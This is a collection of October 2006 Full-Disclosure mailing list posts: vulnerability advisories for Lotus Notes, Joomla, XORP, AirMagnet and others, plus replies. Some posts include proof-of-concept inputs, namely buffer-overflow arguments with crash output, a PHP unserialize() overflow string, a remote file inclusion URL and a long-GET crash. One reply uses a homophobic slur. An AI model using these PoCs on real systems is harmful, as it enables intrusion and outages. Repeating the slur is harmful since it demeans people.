On Wed, 18 Oct 2006 17:38:53 +0200, Secunia Research said: > The problem is that Lotus Notes sets insecure default permissions > (grants "Everyone" group "Full Control") on the "notes" directory and > all child objects. This can be exploited to remove, manipulate, and > replace any of the application's files. Well... Yeah. *duh*. If you want to *collaborate* on stuff, the software has to be set up so that the collaborating group can still make progress, even if the actual file owner is a PHB with the IQ of a dill pickle. :) pgppEvZPaGXSy.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: IBM Lotus Notes Insecure Default Folder Permissions
== Secunia Research 18/10/2006 - IBM Lotus Notes Insecure Default Folder Permissions - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software IBM Lotus Notes 6.5.4 and 6.5.5. IBM Lotus Notes 7.0.0 and 7.0.1. == 2) Severity Rating: Less critical Impact: Privilege Escalation, Manipulation of Data Where: Local System == 3) Vendor's Description of Software "IBM Lotus Notes continues to set the standard for innovation in the messaging and collaboration market Lotus defined over a decade ago. As an integrated collaborative environment, the Lotus Notes client and the IBM Lotus Domino server combine enterprise-class messaging and calendaring & scheduling capabilities with a robust platform for collaborative applications". Product Link: http://www.lotus.com/products/product4.nsf/wdocs/noteshomepage == 4) Description of Vulnerability Secunia Research has discovered a security issue in Lotus Notes, which can be exploited by malicious, local users to manipulate arbitrary files. The problem is that Lotus Notes sets insecure default permissions (grants "Everyone" group "Full Control") on the "notes" directory and all child objects. This can be exploited to remove, manipulate, and replace any of the application's files. == 5) Solution Update to version 7.0.2. == 6) Time Table 22/07/2005 - Vendor notified. 22/07/2005 - Vendor response. 18/10/2006 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References IBM: http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21246773 The Common Vulnerabilities and Exposures (CVE) project has assigned candidate number CVE-2005-2454 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2005-29/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Joomla BSQ Sitestats Script Insertion and SQL Injection
== Secunia Research 18/10/2006 - Joomla BSQ Sitestats Script Insertion and SQL Injection - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software Joomla BSQ Sitestats 1.8.0 and 2.2.1. NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Cross Site Scripting Manipulation of data Where: From remote == 3) Vendor's Description of Software "BSQ Sitestats is a site stats module that is lightweight on the front end but offers both tabular and graphical summaries of site visitors' sessions on the backend". Product Link: http://developer.joomla.org/sf/projects/bsq_sitestats == 4) Description of Vulnerability Secunia Research has discovered some vulnerabilities in the BSQ Sitestats component for Joomla, which can be exploited by malicious people to conduct script insertion or SQL injection attacks. 1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quotes_gpc" is disabled. == 5) Solution Update to version 2.2.2. == 6) Time Table 28/09/2006 - Vendor notified. 29/09/2006 - Vendor response. 18/10/2006 - Public disclosure. == 7) Credits Discovered by Sven Krewitt, Secunia Research. == 8) References None. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-65/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XNetMine (no version) multiple buffer overflow.
Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz
Vulnerable code:
--
line: 672/676
if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682
if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688
if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--
Proof of concept:
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAA(...)
ServerName:"A(...)"
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:
Name:"(...)" ServerName:""
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"A(...)"
Segmentation fault
--
Debug information:
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()
-- federico
[EMAIL PROTECTED] / http://defsol.plugs.it/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] shttpd long get request vuln ( retro )
morning wood, you are a complete fucking moron/faggot. On 10/18/06, Morning Wood <[EMAIL PROTECTED]> wrote: see attatched retro advisory___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] speaking of code crunching... (challenge)
I have 330 bytes, but without encryption. I could thank the virus writer whose file header I used, but I won't. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in Highwall Enterprise and Highwall Endpoint management interface
Multiple vulnerabilities in Highwall Enterprise and Highwall Endpoint 4.0.2.11045 management interface SUMMARY Highwall Enterprise and Highwall Endpoint wireless IDS management interface contain multiple vulnerabilities which can lead to privilege escalation and code execution. DETAILS Web interface of Highwall Enterprise and Highwall Endpoint don't properly screens characters in user supplied input. This can lead to Multiple Cross-Site Scripting and SQL Injection conditions. Vulnerabilities can be exploited by malicious system operator to escalate privileges or run code on his choice in context of Microsoft SQL Server back-end database. Also these vulnerabilities possible can be exploited by external attacker by using Access Point with special created SSID to bypass security restrictions or escalate privileges. DISCLOSURE TIMELINE 8 September 2006 - Initial vendor contact, no response received. September 2006 - Initial vendor contact, no response received. 18 October 2006 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update
Thanks, David, for your always enlightening (and depressing if you use Oracle products) reports on the unbreakable database. --On Wednesday, October 18, 2006 07:55:35 +0100 David Litchfield <[EMAIL PROTECTED]> wrote: Hey all, I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the October 2006 Critical Patch Update that was released yesterday: http://www.oracle.com/technology/deploy/security/critical-patch-updates/c puoct2006.html. Further, it's a shame to see that, after a promising July 2006 CPU where Oracle had all the patches ready *on time*, they have slipped back into their old, bad habits - patches are not ready for a number of platforms. I thought they'd solved those issues - but clearly not. You can get a copy of the analysis from http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf, Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44(0) 208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7spAbndV3Hsz.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joe Job - to blue pill
William Knowles wrote: >One time mailings with companies I have no previous business relationships I can almost forgive, subscribing me to mailing lists without my permission, I >can't. and the e-mails sent to the list do not contain any apparent way to unsubscribe. I don't know about any one else, but I did not get a notice that I was subscribed, or how to unsubscribe. I'm thinking Joe just self-fulfilled his own prophecy on "tons of mailserver blacklists by the end of the day today". So, how about the name of the company that sold you the list, Joe? - L smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Airmagnet management interfaces multiple vulnerabilities
Airmagnet management interfaces multiple vulnerabilities A management interface of AirMagnet Enterprise contains several middle-risk vulnerabilities. Vulnerabilities ranges from reflected and stored Cross-Site scripting to remote code execution and protection bypass. Smart Sensor Edge Sensor Reflected (non persistent) XSS in 404 error page. Stored (persistent) XSS in log viewer via user name in failed logon record. Enterprise Server Web-interface stored XSS AirMagnet Enterprise Server provides feature which can be used to check server status via https (Enterprise Server Status Overview). One of the pages (ACL) displays monitored APs status. SSID of AP echoed to the user browser without screening which can lead to XSS conditions. AirMagnet Enterprise console and Remote Sensor console (Laptop) XAS AirMagnet AirWISE feature provide detailed description of detected attacks. . AirMagnet console uses for displaying information about an intrusion embedded Internet Explorer object and inserts in the HTML template SSID of access points (or the client) without screening. AirMagnet Enterprise console SSL mitm attack AirMagnet Enterprise console don’t validate Enterprise Server certificate, which can be used by attacker who can realize mitm condition between Server and Console to decrypt traffic and sniff administrator and sensors passwords. DISCLOSURE TIMELINE May - September 2006 - Attempts to contact vendor without intelligible response. 18 October 2006 – Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PHP 5 ecalloc memory manager unserialize() array int overflow ia 32 bits poc
"ia 32 bits poc"poc = Proof Of ConceptOn 10/18/06, Josh Bressers <
[EMAIL PROTECTED]> wrote:>> >> print_r(unserialize('a:1073741823:{i:0;s:30:"aa"}'));
> ?>>> in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow> here segfault in zend_hash_find() but it's possible to fake the bucket and> exploit a zend_hash_del_index_or_key
> i tried a memory dump , just fake the bucked with the pointer of the> $GLOBALS's bucket but segfault before in memory_shutdown...>This looks to be CVE-2006-4812, which was discovered by Stefan Esser. He
published his advisory last week:http://www.hardened-php.net/advisory_092006.133.html--JB___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia -
http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Boonex Dolphin 5.2 Remote File Inclusion
// http://www.w4cking.com CREDIT: w4ck1ng.com PRODUCT: Boonex Dolphin 5.2 http://www.boonex.com/products/dolphin/ VULNERABILITY: Remote File Inclusion NOTES: - requires register globals on - requires magic quotes off POC: //templates/tmpl_dfl/scripts/index.php?dir[inc]= ADVISORY & EXPLOIT (requires registration): http://w4ck1ng.com/board/showthread.php?t=1490 // ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Comdev One Admin 4.1 Remote File Inclusion
> - requires register globals on > - requires magic quotes off Seriously, who gives a shit then? And who gives a rats ass about file inclusion in a crappy php script run only by you, your sister and the author? It's as useful as buffer overflows in non-suid binaries, akin to releasing advisories stating - requires user to download and execute binary - requires blank administrator password - requires chmod +s /bin/* > ADVISORY & EXPLOIT (requires registration): > http://w4ck1ng.com/board/showthread.php?t=1491 BLA BLA HOW TO FIND BUGS LIKE THIS (requires lack of dayjob, desire for 'fame'): wget -m crappy-php-coders.com/stupid-scripts ; egrep -r 'include\(\$|require\(\$' . | bugtraq-mailer-including-selfpromotion-crap -- lol @ security 'industry', it's like printing ones own monies!!"3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Thanks. But don´t worry I won´t read sh... anyway :) Nothing interesting could come from that hitman anyway.RegardsWACOn 10/16/06, Pink Hat <[EMAIL PROTECTED]> wrote: On 10/16/06, wac <[EMAIL PROTECTED]> wrote:> Hey you could start by writing those sites in english :P> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [MU-200610-01] Denial of Service in XORP OSPFv2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Denial of Service in XORP OSPFv2 [MU-200610-01] October 17, 2006 http://labs.musecurity.com/advisories.html Affected Product/Versions: XORP OSPFv2 1.2, 1.3 Product Overview: "XORP is the eXtensible Open Router Platform. Our goal is to develop an open source software router platform that is stable and fully featured enough for production use, and flexible and extensible enough to enable network research. Currently XORP implements routing protocols for IPv4 and IPv6 and a unified means to configure them." Vulnerability Details: OSPF carries link state information using Link State Advertisements. Each LSA contains a length field as well as a checksum. XORP performs a checksum verification when processing an LSA. During the checksum verification, the length field is used to calculate the payload. An invalid length field causes an out of bounds read, causing the OSPF daemon to crash. Vendor Response / Solution: Apply the relevant patch to your XORP system and follow vendor instructions. [XORP 1.2] # wget http://www.xorp.org/patches/SA-06:01/xorp_sa_06:01.ospf_1.2.patch [XORP 1.3] # wget http://www.xorp.org/patches/SA-06:01/xorp_sa_06:01.ospf_1.3.patch Mu Security would like to thank XORP for timely remediation of this vulnerability. History: 10/13/06 - First contact with vendor 10/16/06 - Patch available 10/17/06 - Advisory released Credit: This vulnerability was discovered by the Mu Security research team. http://labs.musecurity.com/pgpkey.txt Mu Security offers a new class of security analysis system, delivering a rigorous and streamlined methodology for verifying the robustness and security readiness of any IP-based product or application. Founded by the pioneers of intrusion detection and prevention technology, Mu Security is backed by preeminent venture capital firms that include Accel Partners, Benchmark Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For more information, visit the company's website at http://www.musecurity.com. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.4 (Darwin) iD8DBQFFNUJ4Ml+docYeP+YRAroCAJ92uQQMjbdsQhY30snYXmU5oZpiDQCfcXuH 05TaD1EHyE16qFh9ZD1/xyE= =PBU6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] shttpd long get request vuln ( retro )
see attatched retro advisory - EXPL-A-2006-005 exploitlabs.com Retro Advisory 002 - - SHTTPD - AFFECTED PRODUCTS = SHTTPD < v1.34 http://shttpd.sourceforge.net/ OVERVIEW "SHTTPD is a lightweight web server. The main design goals are the ease of use and the ability to embed. Ideal for personal use, web-based software demos (like PHP, Perl etc), quick file sharing. A care has been taken to make the code secure" RETRO-RELEASE DATE: === Oct 10, 2005 Duplicate Release: Oct 06, 2006 by: sk0de http://secunia.com/advisories/22294/ DETAILS === SHTTPD is vulnerable to an overly long GET request. SOLUTION patch: Upgrade to v1.35 PROOF OF CONCEPT 1.start SHTTPD 2.send an overly long GET request http://[host]/Ax274 chars ( v1.27 - v1.30 ) http://[host]/Ax256 chars ( v1.34 ) v1.31-v1.33 untested 2a. PoC by Sk0de http://www.milw0rm.com/exploits/2482 CREDITS === "sk0de - http://secunia.com/advisories/22294/ " RETRO-CREDITS = This vulnerability was discovered and researched by Donnie Werner of Exploitlabs. At the original time of discovery and retro-release date, the author was not aware of any other advisories or research by 3rd parties. Donnie Werner [EMAIL PROTECTED] [EMAIL PROTECTED] -- web:http://exploitlabs.com http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txt___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update
Hey all, I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the October 2006 Critical Patch Update that was released yesterday: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2006.html. Further, it's a shame to see that, after a promising July 2006 CPU where Oracle had all the patches ready *on time*, they have slipped back into their old, bad habits - patches are not ready for a number of platforms. I thought they'd solved those issues - but clearly not. You can get a copy of the analysis from http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf, Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44(0) 208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
